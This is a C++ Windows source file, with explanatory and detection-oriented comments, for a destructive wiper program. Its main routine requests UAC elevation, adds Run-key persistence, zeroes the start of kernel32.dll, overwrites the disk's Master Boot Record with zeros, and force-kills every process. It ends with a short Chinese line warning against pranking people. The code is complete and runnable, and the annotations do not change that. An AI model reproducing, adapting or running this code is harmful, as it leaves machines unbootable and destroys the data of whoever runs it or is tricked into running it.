#include <iostream>
#include <cstdlib>
#include <windows.h>
#include<bits/stdc++.h>
#include<ctime>
#include <stdio.h>
#include <string>
#include <tchar.h>
#include <shellapi.h>
using namespace std;
// Persistence: writes the path of this executable into the per-user
// Run key (HKCU\...\CurrentVersion\Run) so it is launched at every logon.
// The value name written is "MyStartupApp" — a useful detection indicator.
// Failures are not reported: GetModuleFileName's return value is ignored
// and the else branch for a failed RegOpenKeyEx is empty.
void SetStartup()
{
TCHAR path[MAX_PATH];
// Full path of the running module (NULL = the current process image).
GetModuleFileName(NULL, path, MAX_PATH);
HKEY hKey;
LONG result = RegOpenKeyEx(HKEY_CURRENT_USER,
_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
0,
KEY_SET_VALUE,
&hKey);
if (result == ERROR_SUCCESS) {
// REG_SZ payload; the byte size covers the terminating NUL in TCHAR units.
RegSetValueEx(hKey, _T("MyStartupApp"), 0, REG_SZ,
(const BYTE*)path, (lstrlen(path) + 1) * sizeof(TCHAR));
RegCloseKey(hKey);
} else {
// Key could not be opened: no persistence is written and nothing is logged.
}
}
// Returns true when the token of the current process is a member of the
// local Administrators group (the well-known SID built from
// SECURITY_BUILTIN_DOMAIN_RID / DOMAIN_ALIAS_RID_ADMINS).
// CheckTokenMembership is called with a NULL token handle, i.e. it
// inspects the calling thread's impersonation token or, failing that, the
// process token. If the SID cannot be allocated, isAdmin stays FALSE and
// the function reports "not admin".
bool IsRunningAsAdmin()
{
BOOL isAdmin = FALSE;
PSID administratorsGroup = NULL;
SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
if (AllocateAndInitializeSid(&ntAuthority, 2,
SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&administratorsGroup))
{
// Return value of CheckTokenMembership itself is not examined.
CheckTokenMembership(NULL, administratorsGroup, &isAdmin);
FreeSid(administratorsGroup);
}
return isAdmin == TRUE;
}
// UAC elevation attempt: when not already running as an administrator,
// re-launches this same executable through ShellExecuteEx with the
// "runas" verb, which raises the UAC consent prompt for a second,
// elevated instance.
// Note the control flow: this function neither waits for the elevated
// child nor terminates the current process, so the unelevated instance
// continues into the rest of main() regardless of the prompt's outcome.
// A refused or failed launch (ShellExecuteEx returning FALSE) is ignored.
void RestartAsAdmin()
{
if (IsRunningAsAdmin())
{
return; // Already running as admin
}
TCHAR szFilePath[MAX_PATH];
if (GetModuleFileName(NULL, szFilePath, MAX_PATH))
{
// cbSize set; fMask left at 0, so no process handle is returned.
SHELLEXECUTEINFO sei = { sizeof(sei) };
sei.lpVerb = TEXT("runas");
sei.lpFile = szFilePath;
sei.nShow = SW_SHOWNORMAL;
if (!ShellExecuteEx(&sei))
{
// Handle error
}
}
}
// Enables a single privilege on the current process token.
// The privilege LUID is hard-coded (LowPart 20, HighPart 0) instead of
// being resolved by name through LookupPrivilegeValue; the function name
// indicates it is meant to be SeDebugPrivilege. Neither the return value
// of AdjustTokenPrivileges nor GetLastError (ERROR_NOT_ALL_ASSIGNED when
// the token does not hold the privilege) is checked.
// This function is defined but never called from main() in this file.
VOID
DebugPriv(
VOID
)
{
HANDLE Token;
// Room for TOKEN_PRIVILEGES plus one extra LUID_AND_ATTRIBUTES entry;
// only Privileges[0] is used below.
UCHAR Buf[sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES)];
PTOKEN_PRIVILEGES Privs;
if (OpenProcessToken(GetCurrentProcess(),
MAXIMUM_ALLOWED,
&Token)) {
Privs = (PTOKEN_PRIVILEGES)Buf;
Privs->PrivilegeCount = 1;
Privs->Privileges[0].Luid.LowPart = 20L;
Privs->Privileges[0].Luid.HighPart = 0;
Privs->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// FALSE = do not disable all privileges; no previous state is requested.
AdjustTokenPrivileges(Token,
FALSE,
Privs,
0,
NULL,
NULL);
CloseHandle(Token);
}
}
// DESTRUCTIVE: overwrites the first 512 bytes of the first physical disk
// (\\.\PHYSICALDRIVE0, i.e. the Master Boot Record) with zeros, which
// leaves the machine unable to boot. Opening the raw device for writing
// requires administrator rights; the fopen result is not checked before
// fwrite/fclose are called on it.
// Detection angle: user-mode write access to \\.\PHYSICALDRIVE0 at
// offset 0 is a strong wiper indicator.
void kill_mbr()
{
FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
char mbr[512]={ 0 };
fwrite(mbr, sizeof(mbr), 1, disk);
fclose(disk);
}
// DESTRUCTIVE: overwrites the first 666 bytes of the 32-bit kernel32.dll
// under C:\Windows\SysWOW64 with zeros, corrupting a core system library.
// Writing to that location requires elevated rights; the fopen result is
// not checked before fwrite/fclose. Despite the name, nothing is
// "infected" in the replicating sense — the file is simply damaged.
// The local buffer is named `write`, which is easy to confuse with the
// POSIX write() function when reading the code.
void infect()
{
FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
char write[666] = { 0 };
fwrite(write, sizeof(write), 1, infect_file);
fclose(infect_file);
}
// Entry point. Execution order:
//   1. RestartAsAdmin() — requests UAC elevation for a second instance,
//      but this (possibly unelevated) process keeps going.
//   2. SetStartup()     — Run-key persistence under HKCU.
//   3. infect()         — zeroes the start of SysWOW64\kernel32.dll.
//   4. kill_mbr()       — zeroes the MBR of PHYSICALDRIVE0.
//   5. taskkill /f with filter "pid ne 1" — forcibly terminates every
//      process whose PID is not 1, i.e. effectively all processes.
// DebugPriv() is defined above but never invoked here.
int main()
{
RestartAsAdmin();
SetStartup();
infect();
kill_mbr();
system("taskkill /f /fi \"pid ne 1\"");
return 0;
}
不要去整人,现在还在医院里(((